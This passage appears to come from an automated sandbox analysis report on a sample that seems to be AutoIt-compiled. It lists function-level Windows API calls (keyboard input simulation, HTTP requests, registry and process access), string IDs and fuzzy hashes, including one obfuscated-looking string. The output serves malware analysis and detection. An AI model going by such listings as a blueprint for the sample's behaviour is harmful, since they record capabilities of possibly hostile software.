                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                  • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                  • API String ID: 4237274167-1221869570
                                                  • Opcode ID: 919489e7df7a6811beab1de0f115d299a0cbf0bf7d517ba117956efc960357a2
                                                  • Instruction ID: 3c15f743eddf5c14f79f01e9c05a9789891a72e3b9dfb1ab12856df7e1ca15fe
                                                  • Opcode Fuzzy Hash: 919489e7df7a6811beab1de0f115d299a0cbf0bf7d517ba117956efc960357a2
                                                  • Instruction Fuzzy Hash: DE917C746083019FCB10EF25C48595ABBF4FF89714F14896DF89A8B361DB30E949CB92
                                                  APIs
                                                    • Part of subcall function 00BDFC86: _wcscpy.LIBCMT ref: 00BDFCA9
                                                  • _memset.LIBCMT ref: 00C22B87
                                                  • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00C22BB6
                                                  • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00C22C69
                                                  • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00C22C97
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                  • String ID: 0
                                                  • API String ID: 4152858687-4108050209
                                                  • Opcode ID: f8eea509c4a1c6bc87baaa482cff6ac6724ab4e3269f2912d76f83f4163b7385
                                                  • Instruction ID: 47d19af74723c391c93cc1956251c1aed144e4d173e00becf5fc9759a33f27a2
                                                  • Opcode Fuzzy Hash: f8eea509c4a1c6bc87baaa482cff6ac6724ab4e3269f2912d76f83f4163b7385
                                                  • Instruction Fuzzy Hash: 8051B171508321ABE725AF28E845A6FBBE4EF49350F040A2DF8A5D7690DBB0CE44D752
                                                  APIs
                                                  • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00C1D5D4
                                                  • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00C1D60A
                                                  • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 00C1D61B
                                                  • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00C1D69D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: ErrorMode$AddressCreateInstanceProc
                                                  • String ID: DllGetClassObject
                                                  • API String ID: 753597075-1075368562
                                                  • Opcode ID: 42b5710aa73b004f5f6737ee615560da9a265bb4290e9aa94d77b3df9b45d4e2
                                                  • Instruction ID: d35116baa350aa3a8cbb10324359131fa1eb08592dfba7910b7f89fa802a0222
                                                  • Opcode Fuzzy Hash: 42b5710aa73b004f5f6737ee615560da9a265bb4290e9aa94d77b3df9b45d4e2
                                                  • Instruction Fuzzy Hash: 414180B5600204EFDB15CF54C884BDA7BB9EF46310F1585ADBC0A9F209D7B1DA84EBA0
                                                  APIs
                                                  • _memset.LIBCMT ref: 00C227C0
                                                  • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00C227DC
                                                  • DeleteMenu.USER32(?,00000007,00000000), ref: 00C22822
                                                  • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00C85890,00000000), ref: 00C2286B
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: Menu$Delete$InfoItem_memset
                                                  • String ID: 0
                                                  • API String ID: 1173514356-4108050209
                                                  • Opcode ID: 7d81aa91af000d692d91c2fd29e5ef5d2a2972991e1ec45077c1e7ea5c3d403c
                                                  • Instruction ID: 8ad02d134cc110c099edc8a63fb152c9498fe5133916b9a6fa7e08e266e64c1d
                                                  • Opcode Fuzzy Hash: 7d81aa91af000d692d91c2fd29e5ef5d2a2972991e1ec45077c1e7ea5c3d403c
                                                  • Instruction Fuzzy Hash: DC41CF72204351AFD720DF24E884F6ABBE8EF85314F04492DF8A6972D1DB70E905CB62
                                                  APIs
                                                  • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00C20B27
                                                  • SetKeyboardState.USER32(00000080,?,00000001), ref: 00C20B43
                                                  • PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 00C20BA9
                                                  • SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 00C20BFB
                                                  Strings
                                                  • jdyakj0yakjcyakjcyakj2yakj8yakj9yakj4yakjdyakjfyakjcyakj5yakj7yakj5yakj6yakj8yakj9yakj6yakj5yakjfyakj4yakj8yakj3yakjeyakj4yakjfyak, xrefs: 00C20B5D
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: KeyboardState$InputMessagePostSend
                                                  • String ID: jdyakj0yakjcyakjcyakj2yakj8yakj9yakj4yakjdyakjfyakjcyakj5yakj7yakj5yakj6yakj8yakj9yakj6yakj5yakjfyakj4yakj8yakj3yakjeyakj4yakjfyak
                                                  • API String ID: 432972143-549041074
                                                  • Opcode ID: 69262673725f796d056105a3b42dfd04a7fd5dbe669de7e43789d3e6400f33fd
                                                  • Instruction ID: 02d20f68d9cd340a5d5bd5e7ca528fedeffe7bb445f5c078a6fd10e05b63fab4
                                                  • Opcode Fuzzy Hash: 69262673725f796d056105a3b42dfd04a7fd5dbe669de7e43789d3e6400f33fd
                                                  • Instruction Fuzzy Hash: 68314B70D44628AFFF308B25AC05BFEBBA5AB45315F24425BF4A0519D2C3748A819751
                                                  APIs
                                                  • GetKeyboardState.USER32(?,7707C0D0,?,00008000), ref: 00C20C66
                                                  • SetKeyboardState.USER32(00000080,?,00008000), ref: 00C20C82
                                                  • PostMessageW.USER32(00000000,00000101,00000000), ref: 00C20CE1
                                                  • SendInput.USER32(00000001,?,0000001C,7707C0D0,?,00008000), ref: 00C20D33
                                                  Strings
                                                  • jdyakj0yakjcyakjcyakj2yakj8yakj9yakj4yakjdyakjfyakjcyakj5yakj7yakj5yakj6yakj8yakj9yakj6yakj5yakjfyakj4yakj8yakj3yakjeyakj4yakjfyak, xrefs: 00C20C9F
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: KeyboardState$InputMessagePostSend
                                                  • String ID: jdyakj0yakjcyakjcyakj2yakj8yakj9yakj4yakjdyakjfyakjcyakj5yakj7yakj5yakj6yakj8yakj9yakj6yakj5yakjfyakj4yakj8yakj3yakjeyakj4yakjfyak
                                                  • API String ID: 432972143-549041074
                                                  • Opcode ID: 53a5628e611ff881a5f818558e6eec3d71d398ebb1a4917cdd1d228dfdd1ca46
                                                  • Instruction ID: 1d92af1090a934be77acd6f7519a4655aacaa6423c6a664f0d79e89cee5266ff
                                                  • Opcode Fuzzy Hash: 53a5628e611ff881a5f818558e6eec3d71d398ebb1a4917cdd1d228dfdd1ca46
                                                  • Instruction Fuzzy Hash: B8315A709002386EFF348B65AC047FEBBA6BB46310F24431FE4A0529D2C3759A46D7A2
                                                  APIs
                                                  • CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 00C3D7C5
                                                    • Part of subcall function 00BC784B: _memmove.LIBCMT ref: 00BC7899
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: BuffCharLower_memmove
                                                  • String ID: cdecl$none$stdcall$winapi
                                                  • API String ID: 3425801089-567219261
                                                  • Opcode ID: 0f2fa084e5fdee1a6377006fba5952986a34b05e95f51217c28f956b24321bba
                                                  • Instruction ID: 6a7eac1cf04818981f09456bb6e6ff29e0fef2ac4f2ad4c0578bfbe7393ee3c0
                                                  • Opcode Fuzzy Hash: 0f2fa084e5fdee1a6377006fba5952986a34b05e95f51217c28f956b24321bba
                                                  • Instruction Fuzzy Hash: CC31B071914609ABCF00EF54CC51AEEB3F4FF14320F1086A9F826976D1DB71A945CB80
                                                  APIs
                                                    • Part of subcall function 00BC7DE1: _memmove.LIBCMT ref: 00BC7E22
                                                    • Part of subcall function 00C1AA99: GetClassNameW.USER32(?,?,000000FF), ref: 00C1AABC
                                                  • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00C18F14
                                                  • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00C18F27
                                                  • SendMessageW.USER32(?,00000189,?,00000000), ref: 00C18F57
                                                    • Part of subcall function 00BC7BCC: _memmove.LIBCMT ref: 00BC7C06
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$_memmove$ClassName
                                                  • String ID: ComboBox$ListBox
                                                  • API String ID: 365058703-1403004172
                                                  • Opcode ID: a14f6a22d1b8ec9d0b06e668f8ae7859d6d7e159845b0bc598ececba19714a4d
                                                  • Instruction ID: f6327b630a81232a2146e6964b23c92fa43feedac7daccff227d8301e94b4a88
                                                  • Opcode Fuzzy Hash: a14f6a22d1b8ec9d0b06e668f8ae7859d6d7e159845b0bc598ececba19714a4d
                                                  • Instruction Fuzzy Hash: 77210475A05108BADB14ABB0CC85EFFB7B9DF06360F04416DF425A71E0DF75598AAA20
                                                  APIs
                                                  • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00C3184C
                                                  • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00C31872
                                                  • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00C318A2
                                                  • InternetCloseHandle.WININET(00000000), ref: 00C318E9
                                                    • Part of subcall function 00C32483: GetLastError.KERNEL32(?,?,00C31817,00000000,00000000,00000001), ref: 00C32498
                                                    • Part of subcall function 00C32483: SetEvent.KERNEL32(?,?,00C31817,00000000,00000000,00000001), ref: 00C324AD
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                  • String ID:
                                                  • API String ID: 3113390036-3916222277
                                                  • Opcode ID: 7f420d7bf46bb00404cefd7e9516740acc5b57e7c479a49371161a0bf5af48aa
                                                  • Instruction ID: 54a6afb0d79781fe4263bf0bf16bfe3c7c7b6e4ca4817388c46e42cc58626348
                                                  • Opcode Fuzzy Hash: 7f420d7bf46bb00404cefd7e9516740acc5b57e7c479a49371161a0bf5af48aa
                                                  • Instruction Fuzzy Hash: 8221CFB1520308BFEB119F65CC85FBF77EDEB49744F14412AF805A6280EB248E05A7B6
                                                  APIs
                                                    • Part of subcall function 00BC1D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00BC1D73
                                                    • Part of subcall function 00BC1D35: GetStockObject.GDI32(00000011), ref: 00BC1D87
                                                    • Part of subcall function 00BC1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00BC1D91
                                                  • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00C46461
                                                  • LoadLibraryW.KERNEL32(?), ref: 00C46468
                                                  • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00C4647D
                                                  • DestroyWindow.USER32(?), ref: 00C46485
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                  • String ID: SysAnimate32
                                                  • API String ID: 4146253029-1011021900
                                                  • Opcode ID: 793eb442746f7b877005a223170c3c0fac6be4c88eeb380a46aaa284c2866f88
                                                  • Instruction ID: 89e9e267d09f0e717a1e76df0c20ae06c4bd8228141eace00d784cb649aec4f4
                                                  • Opcode Fuzzy Hash: 793eb442746f7b877005a223170c3c0fac6be4c88eeb380a46aaa284c2866f88
                                                  • Instruction Fuzzy Hash: E9219D75200205BFEF108FA4DC80FBB37ADFB5A364F109629FA20921A4D771DC51A762
                                                  APIs
                                                  • GetStdHandle.KERNEL32(0000000C), ref: 00C26DBC
                                                  • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00C26DEF
                                                  • GetStdHandle.KERNEL32(0000000C), ref: 00C26E01
                                                  • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00C26E3B
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: CreateHandle$FilePipe
                                                  • String ID: nul
                                                  • API String ID: 4209266947-2873401336
                                                  • Opcode ID: 0ef69c583bf81294d94cac9bdf5e2fa2c42a6c7baa5426f1356095ce90fe2c6d
                                                  • Instruction ID: 1d378851904ebff62fa4858380ed4574527cf483bd8900a916d6d900277faaf0
                                                  • Opcode Fuzzy Hash: 0ef69c583bf81294d94cac9bdf5e2fa2c42a6c7baa5426f1356095ce90fe2c6d
                                                  • Instruction Fuzzy Hash: 29218175600329ABDB209F29EC04B9E77E4FF45720F204A29FDA1D76D0D77099519B60
                                                  APIs
                                                  • GetStdHandle.KERNEL32(000000F6), ref: 00C26E89
                                                  • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00C26EBB
                                                  • GetStdHandle.KERNEL32(000000F6), ref: 00C26ECC
                                                  • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 00C26F06
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: CreateHandle$FilePipe
                                                  • String ID: nul
                                                  • API String ID: 4209266947-2873401336
                                                  • Opcode ID: 389fb7623689e4acaccec4afe3a26e7bbe4f15557f31a820a8143abff81e0386
                                                  • Instruction ID: 999c21f57d0a21681d06890cc64f510d64f3a4ecb2b004770e9ec8d42202e4d0
                                                  • Opcode Fuzzy Hash: 389fb7623689e4acaccec4afe3a26e7bbe4f15557f31a820a8143abff81e0386
                                                  • Instruction Fuzzy Hash: 64216D796003259BDB20AF69EC04BAE77A8AF55730F200A19FDB1D76D0DB70A951CB70
                                                  APIs
                                                  • SetErrorMode.KERNEL32(00000001), ref: 00C2AC54
                                                  • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00C2ACA8
                                                  • __swprintf.LIBCMT ref: 00C2ACC1
                                                  • SetErrorMode.KERNEL32(00000000,00000001,00000000,00C4F910), ref: 00C2ACFF
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: ErrorMode$InformationVolume__swprintf
                                                  • String ID: %lu
                                                  • API String ID: 3164766367-685833217
                                                  • Opcode ID: 14b69337d34c02520dfc28ea2f2205a6ea9d87fb0d9ca2232abd17f080120a48
                                                  • Instruction ID: 86760e02b9e4bfaac17a9867a14e5a223e57d3ee51bd820c1cee3fd036e9fb61
                                                  • Opcode Fuzzy Hash: 14b69337d34c02520dfc28ea2f2205a6ea9d87fb0d9ca2232abd17f080120a48
                                                  • Instruction Fuzzy Hash: 5721AF35A00109AFCB10EF65DD45EAE7BF8FF89714B0040A9F909EB251DB71EA41CB21
                                                  APIs
                                                  • CharUpperBuffW.USER32(?,?), ref: 00C21B19
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: BuffCharUpper
                                                  • String ID: APPEND$EXISTS$KEYS$REMOVE
                                                  • API String ID: 3964851224-769500911
                                                  • Opcode ID: e030851d2050f5b8cfd75b2f359113326fe989364957e3cdabcde84ca266fba8
                                                  • Instruction ID: 7359309bd2d0637573b452b7249d20843ca7b6c0764d4fa58bd8a053aa0aa8a0
                                                  • Opcode Fuzzy Hash: e030851d2050f5b8cfd75b2f359113326fe989364957e3cdabcde84ca266fba8
                                                  • Instruction Fuzzy Hash: 4211A1B09501988FCF00EF94D8519FEB3F4FF35304B1484A8D82867A91EB329D4ACB50
                                                  APIs
                                                  • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00C3EC07
                                                  • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00C3EC37
                                                  • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 00C3ED6A
                                                  • CloseHandle.KERNEL32(?), ref: 00C3EDEB
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                  • String ID:
                                                  • API String ID: 2364364464-0
                                                  • Opcode ID: d80fd0c384fb7075f815126c0e8962c5a06d1e09f65a3af1aa07ff7369986736
                                                  • Instruction ID: 9f191ad0c2081d94f5bdfbf76e97f5a08bf909292de9914f77847acd8a3e7463
                                                  • Opcode Fuzzy Hash: d80fd0c384fb7075f815126c0e8962c5a06d1e09f65a3af1aa07ff7369986736
                                                  • Instruction Fuzzy Hash: DC8173716043009FE720EF28C886F6AB7E5AF84750F14885DF9AADB2D2DB70AD41CB51
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                                                  • String ID:
                                                  • API String ID: 1559183368-0
                                                  • Opcode ID: 1d92f2bce51b0a0de234b56dfad0c5d103c922ba67c2ed527f53aae8e5802bd0
                                                  • Instruction ID: fe6d62527636b5927ff826c23633fb4a60383f690e6c254b26aba98627c5543d
                                                  • Opcode Fuzzy Hash: 1d92f2bce51b0a0de234b56dfad0c5d103c922ba67c2ed527f53aae8e5802bd0
                                                  • Instruction Fuzzy Hash: CB51C370A00B85DBCB349FABD88066E77F6EF50329F2487A9F825962D5D770DD908B40
                                                  APIs
                                                    • Part of subcall function 00BC7DE1: _memmove.LIBCMT ref: 00BC7E22
                                                    • Part of subcall function 00C40E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00C3FDAD,?,?), ref: 00C40E31
                                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00C400FD
                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00C4013C
                                                  • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00C40183
                                                  • RegCloseKey.ADVAPI32(?,?), ref: 00C401AF
                                                  • RegCloseKey.ADVAPI32(00000000), ref: 00C401BC
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
